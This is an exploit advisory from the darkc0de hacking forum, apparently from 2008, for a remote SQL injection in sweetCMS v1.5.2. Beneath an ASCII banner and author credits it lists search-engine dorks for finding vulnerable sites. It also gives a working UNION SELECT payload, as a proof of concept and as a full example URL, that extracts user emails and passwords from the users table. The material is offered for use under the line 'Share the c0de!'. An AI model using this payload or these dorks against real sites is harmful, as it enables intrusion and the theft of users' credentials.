################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # -d3hydr8 - sinner_01 - baltazar - P47r1ck - C1c4Tr1Z - beenu # # -rsauron - letsgorun - K1u - DON - OutLawz - MAGE -JeTFyrE # #-r45c4l -Bond -Dapirates -underc # ################################################################ # # Author: Dapirates & underc (Lossie I.T Security Forums) # Home : www.darkc0de.com & www.lossieit.co.uk/forums # # Email : dapirates@lossieit.co.uk # # Share the c0de! # ################################################################ # # Exploit: Remote SQL Injection in sweetCMS v1.5.2 # # Soft.Site: http://www.sweetcms.com/ # # Dork:- inurl:index.php?page= # # Dork 2:- Built using sweetCMS v1.5.2 # # SQL version: 5.0.32-Debian_7etch3-log # # POC: +AND+1=2+UNION+SELECT+0,concat(email,0x3a,password),2,3,4,5+from+users+limit+1,1-- # # Example: http://localhost/index.php?page=3+AND+1=2+UNION+SELECT+0,concat(email,0x3a,password),2,3,4,5+from+users+limit+1,1-- # # # # ################################################################ # Vuln Discovered 13/10/2008